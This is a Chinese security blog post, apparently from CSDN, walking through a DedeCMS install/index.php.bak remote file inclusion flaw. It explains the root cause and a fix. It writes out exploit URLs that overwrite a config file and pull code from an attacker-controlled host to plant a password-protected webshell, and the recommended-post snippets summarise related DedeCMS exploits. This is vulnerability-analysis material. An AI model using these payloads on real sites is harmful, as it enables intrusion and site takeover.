dedecms远程文件包含漏洞

最新推荐文章于 2024-04-07 16:20:44 发布
最新推荐文章于 2024-04-07 16:20:44 发布
阅读量1k 收藏 3
点赞数
分类专栏: web安全 渗透测试 代码审计 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43778463/article/details/127715835
版权

利用前提存在重装漏洞
在这里插入图片描述

在自己网站准备一个远程文件
在这里插入图片描述

http://www.d.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=…/data/admin/config_update.php
在这里插入图片描述

http://www.d.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=1720.php&updateHost=http://www.a.com/
在这里插入图片描述

生成http://www.d.com/install/1720.php 密码 x,webshell连接

存在漏洞的代码
在这里插入图片描述

url参数,存在可以控制的参数,变量被覆盖,如下
insLockfile=a&s_lang=a
从而绕过了包含的远程链接
在这里插入图片描述

代码包含了config_update.php
在这里插入图片描述

修复:
把红框的代码放在前面
在这里插入图片描述

更改位置后
在这里插入图片描述

weixin_43778463
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
dedecms最新版本存在远程包含漏洞--可getshell
pygain的博客
11-01 2247
小编最近发现,9月中旬发布的织梦CMS,由于管理员疏忽易存在远程包含漏洞,可getshell
dedecmsv5.7sp1远程文件包含漏洞审计
安全大白
10-27 789
漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖以至于最后引起远程文件包含漏洞
CVE-2023-2928 DedeCMS 文件包含漏洞getshell 漏洞分析
最新发布
shelter1234567的博客
04-07 1059
这样的话一般的利用方式就不行了,好在cms没用禁用掉文件包含的逻辑,我们可以利用/admin/allowurl.txt 这个文件,实现文件包含任意代码执行。可以将用户输入的字符保存到/admin/allowurl.txt ,因为有stripslashes函数的过滤xss无效。file_manage_control.php 页面为用户提供了网站文件管理的功能,访问file_manage_control.php 利用文件包含构造1.php。尝试在php中或txt中添加php执行代码结果被检测了。
DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553)
WY92139010的博客
08-14 1062
DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553) 一、漏洞描述 该漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖,以至于最后引起远程文件包含漏洞。 二、漏洞影响版本 DeDeCMS < 5.7-sp1,包括5.7 sp1版本 三、漏洞环境搭建 1、下载DeDeCMS V...
【学习笔记】DedeCMS 5.7 /install/index.php 远程文件包含漏洞
chualam的博客
11-02 644
变量覆盖:用我们自己自定义的参数替换程序原有的变量值 一般需要结合程序其他功能来形成完整的攻击 原本带有变量覆盖功能的函数 extract 和prase_str 或者是全局变量导致的覆盖 $$key = $abc $key = '123' $123 = $abc 如果我们可以控制$key 就可以实现变量的覆盖 想想是否可以让require _once变成空 这样就可以成功覆盖了 ...
DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553)
末初的CSDN博客
05-18 2428
文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞复现 漏洞原因 uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖,进而导致远程文件上传Getshell 漏洞影响版本 <= Dedecms V5.7 SP1的所有版本 漏洞原理分析 uploads/install/index.php 对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖,RunMagicQuotes()每个参数的值进行了特殊字符转义处理 继续分析 uploads/install/i
DedeCMS 存储型xss漏洞1
08-03
DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
wLHK-Dedecms漏洞整理.pdf
09-20
从给定的文件信息中,我们可以看到该文件是关于Dedecms漏洞的整理报告,包含了多个漏洞的详情,包括SQL注入漏洞、XSS漏洞等。下面我们将对这些漏洞进行详细的分析和解释。 首先,我们来看第一个漏洞,即Dedecms /...
dede CMS最新采集规则
10-06
dede CMS 最新采集规则 包含 60多个各种采集规则
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
DedeCMS5.7远程文件包含漏洞分析
shelter1234567的博客
09-13 366
访问第二个payload,由于../data/admin/config_update.php为空 $updateHost失去了定义,可以被变量覆盖到, $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";利用 $install_demo_name可控的方式将config_update.php 写入空 让其中的$updateHost失去定义, 写入空执行找不到对应的文件为空, $sql_content 自然就为空。如果业务还有以下代码。
dedecms织梦 标签远程文件写入漏洞
weixin_34261415的博客
03-21 209
测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 前题条件,必须准备好自己的dede数据库,然后插入数据:   insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp =@fopen("1.php", \''a\'');@fwrite($fp, \''\''...
Dedecms织梦远程写文件漏洞
鸥鹭忘机
07-28 963
基本信息 漏洞编号:SSV-89354 CVE-ID:CVE-2015-4553 漏洞类别:变量覆盖 实验版本:dedecms v5.7SP1(部分版本已修复) 利用条件:Apache,dedecms版本为v5.7SP且未修复,自备一台云主机 云主机ip:192.168.18.131 参考文章:http://blog.nsfocus.net/dedecms-write-file-vuln/ https://seclists.org/fulldisclosure/2015/Jun/47 2015年6月17日
c ++ 传递可变长度数组_学习C ++:可变范围
weixin_26737625的博客
08-23 610
c ++ 传递可变长度数组Variable scope refers to the ability of a variable to be “seen” in a program. A variable is seen if, in a specific place in a program, the programmer has access to that variable’s value. ...
远程文件包含 php,php本地及远程文件包含漏洞
weixin_32323455的博客
04-12 470
php程序中包含有file inclusion的时候,php要开启一下两个功能:allow_url_fopen onallow_url_include on但是开启这两个功能之后伴随的是url漏洞,例如:http://192.168.2.109/DVWA-1.9/vulnerabilities/fi/?page=include.php这个连接是正常的连接,但是如果在page后面访问的如果是C:\...
DedeCMS_v5.7漏洞复现
热门推荐
qq_51459600的博客
04-06 1万+
DedeCMS_v5.7漏洞复现 环境搭建: 服务器:WinServer2008(10.10.10.143) + phpstudy2018 DedeCMS版本:DedeCMS-V5.7-UTF8-SP2 下载地址:https://pan.baidu.com/s/1GQjWSDe7IlMVsVJ7HvrBOw 提取码: i4wk 0x01 URL重定向 版本<=5.7sp2 漏洞复现 payload: http://10.10.10.143/Dedecms/plus/download.php?open
漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
做自己喜欢的事,并将其发挥到极致!
05-31 3601
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
dedecms的文件上传漏洞有哪些
05-16
DedeCMS 的文件上传漏洞主要有以下几种: 1. 文件类型检查漏洞DedeCMS 在上传文件时,只做了文件扩展名的检查,而没有检查文件的真实类型,导致攻击者可以通过伪装文件类型的方式来上传恶意文件。 2. 目录遍历漏洞DedeCMS 在文件上传时,未对上传的文件路径进行限制,攻击者可以通过构造特定的文件名来绕过上传目录的限制,实现目录遍历攻击。 3. 文件名绕过漏洞DedeCMS 在上传文件时,未对文件名进行过滤,攻击者可以通过构造特定的文件名,绕过文件名检查,上传恶意文件。 4. 权限控制不严格漏洞DedeCMS 在文件上传时,未对文件上传目录的权限进行严格控制,攻击者可以通过上传恶意文件,覆盖或修改目标文件,实现攻击目的。 以上是 DedeCMS 常见的文件上传漏洞,需要开发者在开发过程中进行防范和修复。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值